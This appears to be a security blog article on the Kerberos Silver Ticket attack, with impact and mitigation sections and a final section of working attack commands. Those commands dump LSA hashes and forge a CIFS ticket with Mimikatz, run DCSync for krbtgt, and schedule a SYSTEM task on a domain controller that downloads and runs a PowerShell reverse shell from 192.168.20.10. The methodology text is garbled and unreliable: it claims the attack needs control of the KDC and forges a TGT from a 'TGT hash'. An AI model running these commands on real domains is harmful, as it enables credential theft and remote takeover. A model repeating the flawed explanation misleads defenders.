Kerberos Silver Ticket Attack – As the digital landscape evolves, ensuring secure authentication has become paramount. Unfortunately, new threats constantly emerge, challenging the effectiveness of existing security measures.

One such threat is the Silver Ticket attack, a sophisticated technique that targets authentication systems.

This article aims to provide a detailed explanation of the Silver Ticket attack, including its methodology, potential impact, and mitigation strategies.

Silver Ticket Attack
Silver Ticket Attack

What is the Kerberos Silver Ticket Attack?

The Silver Ticket attack is a type of advanced attack that targets the Kerberos authentication protocol, primarily used in Windows environments. Kerberos is responsible for authenticating users and services within a network and providing secure access to resources. The Silver Ticket attack abuses weaknesses in the Kerberos implementation to gain unauthorized access and impersonate legitimate users or services.

Methodology

The attack begins with an adversary gaining unauthorized access to the Key Distribution Center (KDC), which is the central authority responsible for issuing Kerberos tickets.

Through various means such as compromising a domain controller or exploiting vulnerabilities, the attacker acquires the necessary credentials to control the KDC.

Once in control of the KDC, the attacker generates a forged Kerberos Ticket Granting Ticket (TGT) known as a Silver Ticket.

This forged ticket contains arbitrary values for the user’s security identifier (SID) and group memberships, enabling the attacker to assume any identity they desire within the compromised domain.

With the Silver Ticket in hand, the attacker can request service tickets for any service within the domain, allowing them to access sensitive resources undetected.

By leveraging the compromised user’s credentials, the attacker can move laterally across the network, escalate privileges, and potentially gain control over critical systems.

Impact

The Silver Ticket attack poses significant risks to organizations, including:

  1. Unauthorized Access: Attackers can impersonate legitimate users or services, bypassing authentication mechanisms and gaining unrestricted access to sensitive information or systems.
  2. Data Breaches: Once inside the network, attackers can exploit their elevated privileges to exfiltrate sensitive data, compromising the confidentiality and integrity of critical information.
  3. Privilege Escalation: By assuming the identity of privileged users or services, attackers can escalate their privileges, potentially compromising the entire network infrastructure.

Mitigation Strategies

To protect against Silver Ticket attacks and enhance overall security, organizations can implement the following measures:

  1. Regular Patching: Keep all systems and software up to date with the latest security patches and updates. Vulnerabilities in the Kerberos implementation are often patched by vendors, reducing the risk of exploitation.
  2. Least Privilege Principle: Implement the principle of least privilege to restrict user and service access rights. Users should only be granted the minimum permissions required to perform their tasks, reducing the potential impact of compromised accounts.
  3. Monitoring and Detection: Implement robust monitoring and detection mechanisms to identify suspicious activities and unauthorized access attempts. Intrusion detection systems, anomaly detection, and log analysis can help in detecting Silver Ticket attacks.
  4. Two-Factor Authentication (2FA): Enable 2FA mechanisms to provide an additional layer of authentication security. By requiring a second form of authentication, such as a physical token or a one-time password, the effectiveness of the Silver Ticket attack can be greatly reduced.
  5. Security Awareness and Training: Educate employees and system administrators about the risks of Silver Ticket attacks and the importance of secure authentication practices. Regular training sessions can help in raising awareness and preventing successful attacks.

Crafting the Silver Ticket

Available Services

Service TypeService Silver Tickets
WMIHOSTRPCSS
PowerShell RemotingHOSTHTTPDepending on OS also:WSMANRPCSS
WinRMHOSTHTTPIn some occasions you can just ask for: WINRM
Scheduled TasksHOST
Windows File Share, also psexecCIFS
LDAP operations, included DCSyncLDAP
Windows Remote Server Administration ToolsRPCSSLDAPCIFS
Golden Ticketskrbtgt
  • The attacker creates a forged service ticket (Silver Ticket) using the TGT hash.
  • The Silver Ticket includes:
    • Target user’s Security Identifier (SID).
    • Target service’s SPN.
    • Desired privileges and access rights.
    • Ticket expiration time and other relevant data.
  • The attacker derives a session key for encryption from the TGT hash.
  • Using this key, the attacker encrypts the Silver Ticket.
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

CIFS

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:7f5b4acaf5174b3282ac22e21e62FF22 /user:Administrator /ptt"'

Schedule a task

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.20.10:8080/Invoke-PowerShellTcp.psi''')'"

Execute a task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

LDAP

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Conclusion

The Silver Ticket attack represents a significant threat to authentication systems, exploiting vulnerabilities in the Kerberos protocol to gain unauthorized access.

Organizations must stay vigilant, implement robust security measures, and regularly update their systems to mitigate the risk of such advanced attacks.

By understanding the methodology behind the Silver Ticket attack and implementing appropriate mitigation strategies, organizations can strengthen their security posture and protect their sensitive data and resources.

It’s important to note that defending against Silver Ticket attacks involves securing the TGT hashes, implementing proper network segmentation, and monitoring for suspicious activities, such as unusual access patterns or unauthorized service ticket requests.

Please keep in mind that discussing or engaging in any form of cyberattacks or unauthorized activities is illegal and unethical. The information provided here is for educational purposes and to promote cybersecurity awareness.

References

Kerberos Silver Ticket Attack

Silver Tickets Attack

Kerberos Golden Ticket Attack Explained

What is a Silver Ticket attack?

A Silver Ticket attack is a type of cyberattack that targets the Kerberos authentication system.

How does a Silver Ticket attack work?

An attacker acquires a TGT hash, identifies the target service’s SPN, and uses the TGT hash to create a forged Silver Ticket.

What data is included in a Silver Ticket?

A Silver Ticket includes the target user’s Security Identifier (SID), the target service’s SPN, desired privileges, access rights, ticket expiration time, and other relevant data.

Avatar of RFS

RFS (36)

Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.

Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.